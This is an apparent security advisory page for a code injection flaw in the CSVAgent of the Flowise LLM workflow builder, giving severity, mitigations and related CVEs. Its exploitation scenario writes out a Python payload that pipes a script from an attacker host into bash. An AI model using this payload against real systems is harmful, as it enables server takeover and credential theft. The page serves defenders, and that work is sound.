AI Threat Alert
CVE-2026-41137: Flowise: RCE via CSVAgent unsanitized code injection
HIGH PoC AVAILABLE CISA: ATTENDA command injection flaw in Flowise's CSVAgent allows any low-privileged user to execute arbitrary OS commands on the server by supplying malicious Pandas code to the custom CSV read code field, which is interpolated and executed without sanitization. The CVSS score of 8.8, a public proof-of-concept exploit, network-accessible attack vector with no user interaction required, and only low-privilege authentication needed make this immediately actionable for any organization running Flowise — particularly those exposing AI workflow builders to developers, analysts, or external users. CISA's SSVC rating of ATTEND confirms near-term remediation is required, and with 59 known CVEs already tracked in this package, Flowise's aggregate security posture demands close scrutiny. Upgrade to Flowise 3.1.0 now; if patching is blocked, disable the CSVAgent node across all flows or restrict Flowise access to trusted administrators only and rotate all credentials accessible from the server environment.
What is the risk?
High risk. All three CVSS impact vectors (Confidentiality, Integrity, Availability) are rated High, requiring only low authentication and no user interaction over the network. A public PoC lowers the exploitation bar to script-level adversaries. Flowise is widely deployed in enterprise AI automation, internal tooling, and multi-user LLM workflow platforms, meaning successful exploitation can pivot to LLM API keys, vector databases, and connected business systems within the same deployment environment.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Flowise | npm | — | No patch |
Do you use Flowise? You're affected.
How severe is it?
What is the attack surface?
What should I do?
5 steps-
Immediate: Upgrade Flowise to version 3.1.0 or later, which contains the sanitization fix.
-
If upgrade is blocked, disable the CSVAgent node in all active flows and restrict Flowise UI access to trusted administrators only.
-
Rotate all credentials accessible from the Flowise server environment (LLM API keys, database credentials, cloud IAM tokens) as a precautionary measure if the instance was accessible to non-admin users.
-
Review server logs for unusual subprocess execution, unexpected outbound connections, or abnormal file system access patterns.
-
Audit all existing CSVAgent custom code configurations for previously injected malicious payloads before re-enabling after patching.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-41137?
A command injection flaw in Flowise's CSVAgent allows any low-privileged user to execute arbitrary OS commands on the server by supplying malicious Pandas code to the custom CSV read code field, which is interpolated and executed without sanitization. The CVSS score of 8.8, a public proof-of-concept exploit, network-accessible attack vector with no user interaction required, and only low-privilege authentication needed make this immediately actionable for any organization running Flowise — particularly those exposing AI workflow builders to developers, analysts, or external users. CISA's SSVC rating of ATTEND confirms near-term remediation is required, and with 59 known CVEs already tracked in this package, Flowise's aggregate security posture demands close scrutiny. Upgrade to Flowise 3.1.0 now; if patching is blocked, disable the CSVAgent node across all flows or restrict Flowise access to trusted administrators only and rotate all credentials accessible from the server environment.
Is CVE-2026-41137 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2026-41137, increasing the risk of exploitation.
How to fix CVE-2026-41137?
1. Immediate: Upgrade Flowise to version 3.1.0 or later, which contains the sanitization fix. 2. If upgrade is blocked, disable the CSVAgent node in all active flows and restrict Flowise UI access to trusted administrators only. 3. Rotate all credentials accessible from the Flowise server environment (LLM API keys, database credentials, cloud IAM tokens) as a precautionary measure if the instance was accessible to non-admin users. 4. Review server logs for unusual subprocess execution, unexpected outbound connections, or abnormal file system access patterns. 5. Audit all existing CSVAgent custom code configurations for previously injected malicious payloads before re-enabling after patching.
What systems are affected by CVE-2026-41137?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM workflow builders, AI automation pipelines, multi-tenant AI platforms.
What is the CVSS score for CVE-2026-41137?
CVE-2026-41137 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 1.45%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0049 Exploit Public-Facing Application AML.T0050 Command and Scripting Interpreter AML.T0053 AI Agent Tool Invocation AML.T0083 Credentials from AI Agent Configuration Compliance Controls Affected
What are the technical details?
Original Advisory
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, The CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide a command injection payload that will get interpolated and executed by the server. This vulnerability is fixed in 3.1.0.
Exploitation Scenario
An attacker with a low-privilege Flowise account — a developer, analyst, or any user with access to the workflow builder — opens or creates a flow containing a CSVAgent node. They modify the custom Pandas CSV read code field to embed a command injection payload, for example injecting `__import__('os').system('curl https://attacker.com/shell.sh | bash')` within the Pandas code string. When the CSVAgent executes against any CSV file, Flowise interpolates the attacker-controlled code into the execution context without sanitization and runs it server-side with the Flowise process privileges. The attacker obtains a reverse shell, exfiltrates environment variables containing LLM API keys and database credentials, and establishes persistence within the AI workflow infrastructure.
Weaknesses (CWE)
CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
- [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
- [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Timeline
Related Vulnerabilities
CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same package: flowise CVE-2026-46442 9.9 Flowise: sandbox escape enables authenticated RCE
Same package: flowise CVE-2025-61913 9.9 Flowise: path traversal in file tools leads to RCE
Same package: flowise CVE-2026-40933 9.9 Flowise: RCE via MCP stdio command injection
Same package: flowise CVE-2026-56274 9.9 Flowise: RCE via MCP server command validation bypass
Same package: flowise